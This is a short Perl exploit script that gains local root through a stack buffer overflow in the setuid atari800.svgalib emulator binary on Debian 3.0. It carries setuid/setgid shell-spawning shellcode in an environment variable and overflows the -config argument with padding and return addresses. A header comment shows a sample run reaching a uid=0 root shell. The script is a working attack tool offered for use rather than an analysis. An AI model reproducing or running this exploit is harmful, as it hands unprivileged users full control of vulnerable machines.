#!/usr/bin/perl
#######################################################
# Priv8security.com atari800 1.3.0-2 local root exploit.
#
# Tested against Debian 3.0
# Based on http://www.debian.org/security/2003/dsa-359
#
# wsxz@debian:~$ perl priv8atari800.pl
# Priv8security.com atari800.svgalib local r00t exploit!!
# usage: priv8atari800.pl offset
# Using address: 0xbfffffb9
# User config file # 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
# Aÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿¹ÿÿ¿' not found.
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=1001(wsxz)
#
#####################################################

$shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

$path = "/usr/bin/atari800.svgalib";
# $retaddr = 0xbffffb90;
$retaddr = 0xbffffffa - length($shellcode) - length($path);
$offset = 0;

$offset = $ARGV[0];

print " Priv8security.com atari800.svgalib local r00t exploit!!\n";
print " usage: $0 offset\n";
print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n";

$newret = pack('l', ($retaddr + $offset));
$buffer = "A" x 234;
$buffer .= $newret x 6;

local($ENV{'WSXZ'}) = $shellcode; exec("$path -config $buffer");